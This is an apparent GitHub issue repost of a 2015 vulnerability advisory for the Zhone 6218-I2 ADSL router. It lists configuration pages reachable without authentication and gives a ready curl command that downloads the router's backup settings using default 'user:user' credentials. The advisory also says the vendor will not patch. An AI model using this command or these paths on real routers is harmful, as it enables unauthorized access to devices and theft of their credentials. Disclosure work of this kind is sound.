hkm / routerpwn.com

Compilation of ready to run exploits, advisories, tools and online key generators for embedded devices.

http://www.routerpwn.com

Multiple Vulnerabilities in Zhone ADSL2+ 4 Port Wireless Bridge/Router (Broadcom)

hkm opened this issue 9 years ago · comments

Pedro Joaquín commented 9 years ago

Exploit Title: Multiple Vulnerabilities in Zhone ADSL2+ 4 Port Wireless Bridge/Router (Broadcom)

Date: 01/09/2015

ZHONE Firmware: 03.02.20

Product Name: 6218-I2-xxx

Firmware Link: http://www.zhone.com/support/downloads/cpe/6218-I2/6218-I2_R030220_AnnexA.zip (Login Required)

Author: Mahmoud Khaled

Contact: mahmoud_khld@yahoo.com

Patch/ Fix: Vendor has not provided(and wont provide) any fix for this yet

Disclosure Timeline

01/09/2015 Contacted Vendor/Vulnerability Explained
01/09/2015 Vendor Replied Denying Responsibility of The Product
01/09/2015 Full Disclosure

Description

A. The following links can be accessed without any authentication:
http:///pvccfg.cgi
http:///dnscfg.cgi
http:///password.cgi (In addition to text storage of sensitive information)

B. Obtaining backup DSL router configurations by a user account authentication:
curl ""http:///backupsettings.conf"" -H ""Authorization: Basic dXNlcjp1c2Vy"" (""dXNlcjp1c2Vy"" = ""user:user"" in base64)